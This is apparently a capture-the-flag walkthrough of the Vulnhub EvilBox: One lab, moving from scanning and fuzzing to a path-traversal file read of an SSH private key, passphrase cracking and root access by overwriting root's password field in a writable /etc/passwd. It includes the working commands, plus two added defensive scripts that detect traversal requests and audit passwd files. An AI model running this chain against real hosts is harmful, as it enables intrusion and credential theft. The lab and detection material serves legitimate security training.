Vulnhub lab -- EVILBOX: ONE
Environment setup
Target connection
Attacker host IP: 192.168.47.130
Target host IP: 192.168.47.131
Information gathering
Scanning the target host shows that ports 22 and 80 are open.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV -sT -A -p- 192.168.47.131
Starting Nmap 7.94 ( https://nmap.org ) at 2023-11-08 07:46 EST
Nmap scan report for 192.168.47.131
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 44:95:50:0b:e4:73:a1:85:11:ca:10:ec:1c:cb:d4:26 (RSA)
| 256 27:db:6a:c7:3a:9c:5a:0e:47:ba:8d:81:eb:d6:d6:3c (ECDSA)
|_ 256 e3:07:56:a9:25:63:d4:ce:39:01:c1:9a:d9:fe:de:64 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 00:0C:29:E9:5C:D1 (VMware)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.61 ms 192.168.47.131
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.78 seconds
Visiting the web page shows only the Apache default page.
Web vulnerability discovery
Brute-force directories with gobuster:
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.47.131
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: php,php.bak,txt.bak,git.bak,git,zip,zip.bak,txt,html,js,html.bak,json
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 10701]
/.html.bak (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/robots.txt (Status: 200) [Size: 12]
/secret (Status: 301) [Size: 317] [--> http://192.168.47.131/secret/]
/.php (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.html.bak (Status: 403) [Size: 279]
/server-status (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================
Visiting /robots.txt shows nothing of interest. Visiting /secret gives a blank page.
Since /secret is a directory rather than a page, continue brute-forcing under http://192.168.47.131/secret/:
┌──(kali㉿kali)-[~]
└─$ sudo gobuster dir -u http://192.168.47.131/secret/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak -t 50
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.47.131/secret/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: zip.bak,php,txt.bak,git,git.bak,html.bak,json,zip,txt,html,js,php.bak
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html (Status: 403) [Size: 279]
/index.html (Status: 200) [Size: 4]
/.html.bak (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
/evil.php (Status: 200) [Size: 0]
/.html.bak (Status: 403) [Size: 279]
/.html (Status: 403) [Size: 279]
/.php (Status: 403) [Size: 279]
Progress: 2867280 / 2867293 (100.00%)
===============================================================
Finished
===============================================================
This path contains /evil.php; visiting it also returns a blank page.
The PHP page most likely expects a parameter, but we do not yet know which, so the parameter name is fuzzed. While fuzzing, consider whether the page might have a file inclusion or command execution vulnerability. The earlier brute-force found an index.html, so we try to read that file through the parameter to test for file inclusion.
Here the ffuf tool is used for the fuzzing.
┌──(kali㉿kali)-[~]
└─$ ffuf -c -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://192.168.47.131/secret/evil.php?FUZZ=../index.html -fs 0
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.47.131/secret/evil.php?FUZZ=../index.html
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 0
________________________________________________
command [Status: 200, Size: 10701, Words: 3427, Lines: 369, Duration: 8ms]
:: Progress: [6453/6453] :: Job [1/1] :: 66 req/sec :: Duration: [0:00:04] :: Errors: 0 ::
Fuzzing reveals a parameter, command, that can read arbitrary files. Since files can be read, try /etc/passwd; it shows that besides root there is a user named mowree.
The initial scan showed that SSH is open, so try reading /home/mowree/.ssh/id_rsa to see whether a private key exists.
The private key does exist, so we can log in to the target as that user with it.
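The evil.php parameter above is a classic local file inclusion / path traversal: every request that abused it left a line in the Apache access log containing `../` sequences and, later, a sensitive path such as `/.ssh/id_rsa`. The following detection script is an added example and is not part of the original write-up or of the lab; it parses constructed access-log lines in Apache combined format (the sample entries, IPs and user agents are made up for illustration), URL-decodes each query value, and flags requests that contain dot-dot traversal or reference well-known sensitive files. The `SENSITIVE` markers are an assumption chosen for this example, not a standard list.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Apache combined format); not taken from the lab.
SAMPLE_LOG = """\
192.168.47.130 - - [08/Nov/2023:07:50:01 -0500] "GET /secret/evil.php?command=../index.html HTTP/1.1" 200 10701 "-" "Fuzz Faster U Fool v2.1.0-dev"
192.168.47.130 - - [08/Nov/2023:07:52:10 -0500] "GET /secret/evil.php?command=../../../../../../../../home/mowree/.ssh/id_rsa HTTP/1.1" 200 1743 "-" "curl/8.4.0"
192.168.47.130 - - [08/Nov/2023:07:52:30 -0500] "GET /secret/evil.php?command=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1500 "-" "curl/8.4.0"
10.0.0.5 - - [08/Nov/2023:07:53:00 -0500] "GET /index.html HTTP/1.1" 200 10701 "-" "Mozilla/5.0"
10.0.0.5 - - [08/Nov/2023:07:53:05 -0500] "GET /secret/evil.php?command=welcome HTTP/1.1" 200 4 "-" "Mozilla/5.0"
"""

# Enough of the combined log format to pull out client IP, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# A ".." path component, bounded by slashes/backslashes or string ends.
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')

# Assumed list of path fragments worth alerting on; extend for your environment.
SENSITIVE = ('/etc/passwd', '/etc/shadow', '/.ssh/', 'id_rsa', '/proc/self/')


def decode_fully(value):
    """Decode percent-encoding twice so %252e%252e (double-encoded) is also caught."""
    return unquote(unquote(value))


def inspect_request(target):
    """Return the reasons a request target looks like a traversal/LFI attempt (empty if clean)."""
    parts = urlsplit(target)
    candidates = [decode_fully(parts.path)]
    # parse_qsl already decodes once; decode_fully handles further layers.
    for _name, value in parse_qsl(parts.query, keep_blank_values=True):
        candidates.append(decode_fully(value))
    reasons = []
    for value in candidates:
        if TRAVERSAL.search(value):
            reasons.append(f"dot-dot traversal in {value!r}")
        for marker in SENSITIVE:
            if marker in value:
                reasons.append(f"sensitive path {marker!r} in {value!r}")
    return reasons


def scan_log(text):
    """Parse each log line and return a list of findings for suspicious requests."""
    findings = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        reasons = inspect_request(match['target'])
        if reasons:
            findings.append({
                'ip': match['ip'],
                'target': match['target'],
                'status': int(match['status']),
                'reasons': reasons,
            })
    return findings


def per_source(findings):
    """Count flagged requests per client IP, a quick way to spot a single scanning host."""
    counts = {}
    for finding in findings:
        counts[finding['ip']] = counts.get(finding['ip'], 0) + 1
    return counts


if __name__ == '__main__':
    hits = scan_log(SAMPLE_LOG)
    for hit in hits:
        print(hit['ip'], hit['status'], hit['target'], '|', '; '.join(hit['reasons']))
    print(per_source(hits))
```

Note that the HTTP 200 status on the flagged lines is what distinguishes a successful read from a blocked probe; a real deployment would also want to alert on a burst of requests to one script with many distinct parameter names, which is the signature the ffuf run above would leave.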
┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
mowree@192.168.47.131's password:
Trying to log in with id_rsa shows that the private key is encrypted (passphrase-protected), so we try to crack the passphrase with john.
First, convert the private key into a hash format that john recognizes using john's ssh2john script:
┌──(kali㉿kali)-[~/tools]
└─$ curl http://192.168.47.131/secret/evil.php?command=../../../../../../../../home/mowree/.ssh/id_rsa > id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1743 100 1743 0 0 373k 0 --:--:-- --:--:-- --:--:-- 425k
┌──(kali㉿kali)-[~/tools]
└─$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E
[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
┌──(kali㉿kali)-[~/tools]
└─$ /usr/share/john/ssh2john.py id_rsa > hash
Next, run john against the hash; the recovered passphrase is unicorn:
┌──(kali㉿kali)-[~/tools]
└─$ john hash --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
unicorn (id_rsa)
1g 0:00:00:00 DONE (2023-11-08 09:13) 100.0g/s 124800p/s 124800c/s 124800C/s ramona..shirley
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Log in to the target host with the private key and its passphrase:
┌──(kali㉿kali)-[~/tools]
└─$ chmod 600 id_rsa
┌──(kali㉿kali)-[~/tools]
└─$ ssh mowree@192.168.47.131 -i id_rsa
Enter passphrase for key 'id_rsa':
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
mowree@EvilBoxOne:~$
Privilege escalation
Gather information about the target host:
mowree@EvilBoxOne:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:e9:5c:d1 brd ff:ff:ff:ff:ff:ff
inet 192.168.47.131/24 brd 192.168.47.255 scope global dynamic ens33
valid_lft 1225sec preferred_lft 1225sec
inet6 fe80::20c:29ff:fee9:5cd1/64 scope link
valid_lft forever preferred_lft forever
mowree@EvilBoxOne:~$ uname -a
Linux EvilBoxOne 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64 GNU/Linux
mowree@EvilBoxOne:~$ id
uid=1000(mowree) gid=1000(mowree) grupos=1000(mowree),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
mowree@EvilBoxOne:~$ pwd
/home/mowree
Look for SUID binaries that could be used for privilege escalation; only the standard ones are present, so nothing useful turns up:
mowree@EvilBoxOne:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/su
Run the linpeas script directly; its checks show that /etc/passwd is writable.
Since the file is both readable and writable, generate a password hash and overwrite the root user's password field with it. Here the chosen password is 12345678:
mowree@EvilBoxOne:~$ openssl passwd -1
Password:
Verifying - Password:
$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1
Switch to the root user: privilege escalation succeeds.
mowree@EvilBoxOne:~$ cat /etc/passwd | head -n 5
root:$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
mowree@EvilBoxOne:~$ su root
Contraseña:
root@EvilBoxOne:/home/mowree#
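The escalation above worked only because /etc/passwd was writable by an unprivileged user and because a password hash placed directly in the second field of /etc/passwd overrides the shadow entry. The audit below is an added example, not part of the original write-up or of the lab: it checks a passwd file for the three conditions a defender would want to catch (group- or world-writable mode, a hash or empty string instead of `x` in the password field, and extra UID 0 accounts). The sample content reuses the root line shown above and adds a constructed `backup` account with UID 0 for illustration; the temporary file and its 0666 mode are created by the demo itself.

```python
import os
import stat
import tempfile

# Sample /etc/passwd content: the root line is the one from the write-up above,
# the "backup" line with UID 0 is constructed to exercise the extra-root check.
SAMPLE_PASSWD = """\
root:$1$li.kLBR.$oyPpweUDzFxnBjNo/NXjx1:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
backup:x:0:34:backup:/var/backups:/bin/bash
mowree:x:1000:1000::/home/mowree:/bin/bash
"""

# Values that mean "look in /etc/shadow" or "account locked"; anything else is a hash.
SHADOWED_OR_LOCKED = {'x', '*', '!', '!!'}


def audit_passwd_entries(text):
    """Return (line_number, user, issue) tuples for suspicious passwd entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(':')
        if len(fields) != 7:
            findings.append((lineno, fields[0], 'malformed entry'))
            continue
        name, password, uid, _gid, _gecos, _home, _shell = fields
        if password == '':
            findings.append((lineno, name, 'empty password field'))
        elif password not in SHADOWED_OR_LOCKED:
            findings.append((lineno, name, 'password hash stored in passwd'))
        if uid == '0' and name != 'root':
            findings.append((lineno, name, 'extra uid 0 account'))
    return findings


def audit_passwd_mode(path):
    """Return the permission problems of the file at path (should be 0644, root-owned)."""
    mode = os.stat(path).st_mode
    problems = []
    if mode & stat.S_IWGRP:
        problems.append('group-writable')
    if mode & stat.S_IWOTH:
        problems.append('world-writable')
    return problems


def run_demo():
    """Write the sample to a temp file with a deliberately loose mode and audit both aspects."""
    handle = tempfile.NamedTemporaryFile('w', delete=False)
    try:
        handle.write(SAMPLE_PASSWD)
        handle.close()
        os.chmod(handle.name, 0o666)  # reproduce the writable-passwd misconfiguration
        return {
            'entries': audit_passwd_entries(SAMPLE_PASSWD),
            'mode': audit_passwd_mode(handle.name),
        }
    finally:
        os.unlink(handle.name)


if __name__ == '__main__':
    result = run_demo()
    for lineno, user, issue in result['entries']:
        print(f'line {lineno}: {user}: {issue}')
    print('mode problems:', result['mode'])
```

To audit a live host, call `audit_passwd_mode('/etc/passwd')` and feed the file's contents to `audit_passwd_entries`; the same two checks are what linpeas reports in its "Interesting writable files" and "Users" sections.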